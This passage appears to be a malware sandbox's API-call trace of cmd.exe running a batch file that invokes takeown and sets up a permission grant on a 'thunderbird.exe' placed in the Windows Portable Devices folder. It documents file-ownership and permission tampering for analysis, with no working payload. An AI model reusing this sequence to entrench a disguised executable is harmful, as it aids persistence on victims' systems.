nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f640, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f640*=0x2) returned 1 [0194.608] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0194.608] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0194.608] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0194.608] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0194.608] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0194.608] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0194.608] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0194.608] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0194.608] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0194.608] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0194.608] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0194.608] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0194.608] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0194.608] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0194.608] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0194.609] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0194.609] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0194.609] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0194.609] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0194.609] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0194.609] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0194.609] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0194.609] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0194.609] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0194.609] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0194.609] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0194.609] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0194.609] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0194.609] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0194.609] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0194.609] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0194.609] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0194.609] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0194.609] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0194.609] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0194.609] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0194.609] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0194.609] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0194.610] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0194.610] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0194.610] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0194.610] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0194.611] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0194.611] GetProcessHeap () returned 0x590000 [0194.611] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a42b0 [0194.611] GetProcessHeap () returned 0x590000 [0194.611] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a43d8 [0194.611] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0xffffffff [0194.611] GetLastError () returned 0x2 [0194.612] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0xffffffff [0194.612] GetLastError () returned 0x2 [0194.612] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0x5a4588 [0194.613] FindClose (in: hFindFile=0x5a4588 | out: hFindFile=0x5a4588) returned 1 [0194.613] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0xffffffff [0194.613] GetLastError () returned 0x2 [0194.614] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f174) returned 0x5a4588 [0194.614] FindClose (in: hFindFile=0x5a4588 | out: hFindFile=0x5a4588) returned 1 [0194.614] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0194.614] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0194.614] GetConsoleTitleW (in: lpConsoleTitle=0x26f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.614] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0194.614] GetProcessHeap () returned 0x590000 [0194.614] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a4840 [0194.615] GetProcessHeap () returned 0x590000 [0194.615] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a4968 [0194.615] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0xffffffff [0194.615] GetLastError () returned 0x2 [0194.615] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0xffffffff [0194.616] GetLastError () returned 0x2 [0194.616] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0x5a4b18 [0194.616] FindClose (in: hFindFile=0x5a4b18 | out: hFindFile=0x5a4b18) returned 1 [0194.616] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0xffffffff [0194.617] GetLastError () returned 0x2 [0194.617] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ea60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea60) returned 0x5a4b18 [0194.617] FindClose (in: hFindFile=0x5a4b18 | out: hFindFile=0x5a4b18) returned 1 [0194.617] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0194.617] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0194.617] GetConsoleTitleW (in: lpConsoleTitle=0x26ef58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.617] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ede0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26eea8 | out: lpAttributeList=0x26ede0, lpSize=0x26eea8) returned 1 [0194.617] UpdateProcThreadAttribute (in: lpAttributeList=0x26ede0, dwFlags=0x0, Attribute=0x60001, lpValue=0x26eea0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ede0, lpPreviousValue=0x0) returned 1 [0194.618] GetStartupInfoW (in: lpStartupInfo=0x26ed9c | out: lpStartupInfo=0x26ed9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0194.634] CloseHandle (hObject=0x74) returned 1 [0194.635] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0194.635] GetProcessHeap () returned 0x590000 [0194.635] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8198 | out: hHeap=0x590000) returned 1 [0194.635] GetEnvironmentStringsW () returned 0x5a5fb0* [0194.635] GetProcessHeap () returned 0x590000 [0194.635] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a8198 [0194.635] FreeEnvironmentStringsW (penv=0x5a5fb0) returned 1 [0194.635] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0199.312] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x26ed7c | out: lpExitCode=0x26ed7c*=0x0) returned 1 [0199.312] CloseHandle (hObject=0x78) returned 1 [0199.312] _vsnwprintf (in: _Buffer=0x26eec4, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ed88 | out: _Buffer="00000000") returned 8 [0199.312] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0199.313] GetProcessHeap () returned 0x590000 [0199.313] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8198 | out: hHeap=0x590000) returned 1 [0199.313] GetEnvironmentStringsW () returned 0x5a5fb0* [0199.313] GetProcessHeap () returned 0x590000 [0199.313] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a8198 [0199.313] FreeEnvironmentStringsW (penv=0x5a5fb0) returned 1 [0199.313] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0199.313] GetProcessHeap () returned 0x590000 [0199.313] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8198 | out: hHeap=0x590000) returned 1 [0199.313] GetEnvironmentStringsW () returned 0x5a5fb0* [0199.313] GetProcessHeap () returned 0x590000 [0199.313] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a8198 [0199.313] FreeEnvironmentStringsW (penv=0x5a5fb0) returned 1 [0199.314] GetProcessHeap () returned 0x590000 [0199.314] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590db8 | out: hHeap=0x590000) returned 1 [0199.314] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ede0 | out: lpAttributeList=0x26ede0) [0199.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.314] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0199.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0199.315] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.315] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0199.316] SetConsoleInputExeNameW () returned 0x1 [0199.316] GetConsoleOutputCP () returned 0x1b5 [0199.316] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0199.316] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.316] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f5fc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0199.317] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0199.318] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.318] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0199.318] GetProcessHeap () returned 0x590000 [0199.318] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4a98 | out: hHeap=0x590000) returned 1 [0199.318] GetProcessHeap () returned 0x590000 [0199.318] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4968 | out: hHeap=0x590000) returned 1 [0199.318] GetProcessHeap () returned 0x590000 [0199.318] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4840 | out: hHeap=0x590000) returned 1 [0199.318] GetProcessHeap () returned 0x590000 [0199.318] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4d18 | out: hHeap=0x590000) returned 1 [0199.318] GetProcessHeap () returned 0x590000 [0199.318] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a47a0 | out: hHeap=0x590000) returned 1 [0199.318] GetProcessHeap () returned 0x590000 [0199.318] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4588 | out: hHeap=0x590000) returned 1 [0199.318] GetProcessHeap () returned 0x590000 [0199.318] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4508 | out: hHeap=0x590000) returned 1 [0199.318] GetProcessHeap () returned 0x590000 [0199.319] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a43d8 | out: hHeap=0x590000) returned 1 [0199.319] GetProcessHeap () returned 0x590000 [0199.319] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42b0 | out: hHeap=0x590000) returned 1 [0199.319] GetProcessHeap () returned 0x590000 [0199.319] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4240 | out: hHeap=0x590000) returned 1 [0199.319] GetProcessHeap () returned 0x590000 [0199.319] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a41b0 | out: hHeap=0x590000) returned 1 [0199.319] GetProcessHeap () returned 0x590000 [0199.319] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4190 | out: hHeap=0x590000) returned 1 [0199.319] GetProcessHeap () returned 0x590000 [0199.319] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591258 | out: hHeap=0x590000) returned 1 [0199.320] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.320] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0199.320] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f5e0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x26f5e0*=0xb3, lpOverlapped=0x0) returned 1 [0199.321] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0199.321] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0199.322] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.322] GetFileType (hFile=0x78) returned 0x1 [0199.322] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.322] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0199.322] GetProcessHeap () returned 0x590000 [0199.322] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4b28 [0199.323] GetProcessHeap () returned 0x590000 [0199.323] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x7e) returned 0x5a4190 [0199.323] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", nBufferLength=0x208, lpBuffer=0x26ed70, lpFilePart=0x26ed68 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", lpFilePart=0x26ed68*="thunderbird.exe") returned 0x39 [0199.323] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x26ea84 | out: lpFindFileData=0x26ea84*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x591258 [0199.323] FindClose (in: hFindFile=0x591258 | out: hFindFile=0x591258) returned 1 [0199.323] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0199.324] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices", lpFindFileData=0x26ea84 | out: lpFindFileData=0x26ea84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe28fefe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe28fefe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 0x591258 [0199.324] FindClose (in: hFindFile=0x591258 | out: hFindFile=0x591258) returned 1 [0199.324] _wcsnicmp (_String1="WIBFE5~1", _String2="Windows Portable Devices", _MaxCount=0x18) returned -12 [0199.324] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", lpFindFileData=0x26ea84 | out: lpFindFileData=0x26ea84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c341860, ftCreationTime.dwHighDateTime=0x1d5b517, ftLastAccessTime.dwLowDateTime=0x98803330, ftLastAccessTime.dwHighDateTime=0x1d56ea7, ftLastWriteTime.dwLowDateTime=0x98803330, ftLastWriteTime.dwHighDateTime=0x1d56ea7, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="thunderbird.exe", cAlternateFileName="THUNDE~1.EXE")) returned 0x591258 [0199.324] FindClose (in: hFindFile=0x591258 | out: hFindFile=0x591258) returned 1 [0199.325] _wcsnicmp (_String1="THUNDE~1.EXE", _String2="thunderbird.exe", _MaxCount=0xf) returned 12 [0199.325] GetProcessHeap () returned 0x590000 [0199.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x591258 [0199.325] GetProcessHeap () returned 0x590000 [0199.325] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0199.328] _tell (_FileHandle=3) returned 63 [0199.328] _close (_FileHandle=3) returned 0 [0199.328] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f3b4 | out: _Buffer="\r\n") returned 2 [0199.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.328] GetFileType (hFile=0x7) returned 0x2 [0199.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f374 | out: lpMode=0x26f374) returned 1 [0199.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.329] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f3a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f3a0*=0x2) returned 1 [0199.330] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0199.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0199.331] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f3b0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0199.331] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f3b0 | out: _Buffer=">") returned 1 [0199.331] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.331] GetFileType (hFile=0x7) returned 0x2 [0199.331] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.331] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f378 | out: lpMode=0x26f378) returned 1 [0199.332] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.332] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x26f3a4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x26f3a4*=0x26) returned 1 [0199.332] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.333] GetFileType (hFile=0x7) returned 0x2 [0199.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5fc | out: lpMode=0x26f5fc) returned 1 [0199.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.334] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x590dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x26f628, lpReserved=0x0 | out: lpBuffer=0x590dc0*, lpNumberOfCharsWritten=0x26f628*=0x3) returned 1 [0199.334] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f634 | out: _Buffer=" FN=\"thunderbird.exe\" ") returned 22 [0199.334] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.334] GetFileType (hFile=0x7) returned 0x2 [0199.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.335] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0199.335] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.335] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x16) returned 1 [0199.336] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f654 | out: _Buffer="\r\n") returned 2 [0199.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.336] GetFileType (hFile=0x7) returned 0x2 [0199.336] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.336] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f614 | out: lpMode=0x26f614) returned 1 [0199.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.337] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f640, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f640*=0x2) returned 1 [0199.338] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0199.338] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0199.338] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0199.338] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0199.339] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0199.339] _wcsicmp (_String1="set", _String2="CD") returned 16 [0199.339] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0199.339] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0199.339] _wcsicmp (_String1="set", _String2="REN") returned 1 [0199.339] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0199.339] _wcsicmp (_String1="set", _String2="SET") returned 0 [0199.339] GetConsoleTitleW (in: lpConsoleTitle=0x26f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.339] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0199.340] SetEnvironmentVariableW (lpName="FN", lpValue="\"thunderbird.exe\"") returned 1 [0199.340] GetProcessHeap () returned 0x590000 [0199.340] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8198 | out: hHeap=0x590000) returned 1 [0199.340] GetEnvironmentStringsW () returned 0x5a6b40* [0199.340] GetProcessHeap () returned 0x590000 [0199.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb86) returned 0x5a76d0 [0199.340] FreeEnvironmentStringsW (penv=0x5a6b40) returned 1 [0199.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.340] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0199.341] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.341] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0199.341] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.341] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0199.342] SetConsoleInputExeNameW () returned 0x1 [0199.342] GetConsoleOutputCP () returned 0x1b5 [0199.342] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0199.342] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f5fc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0199.343] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0199.343] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.343] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0199.343] GetProcessHeap () returned 0x590000 [0199.343] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42b8 | out: hHeap=0x590000) returned 1 [0199.343] GetProcessHeap () returned 0x590000 [0199.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4278 | out: hHeap=0x590000) returned 1 [0199.344] GetProcessHeap () returned 0x590000 [0199.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591288 | out: hHeap=0x590000) returned 1 [0199.344] GetProcessHeap () returned 0x590000 [0199.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590db8 | out: hHeap=0x590000) returned 1 [0199.344] GetProcessHeap () returned 0x590000 [0199.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4218 | out: hHeap=0x590000) returned 1 [0199.344] GetProcessHeap () returned 0x590000 [0199.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591258 | out: hHeap=0x590000) returned 1 [0199.344] GetProcessHeap () returned 0x590000 [0199.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4190 | out: hHeap=0x590000) returned 1 [0199.344] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.344] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0199.344] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f5e0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x26f5e0*=0xa3, lpOverlapped=0x0) returned 1 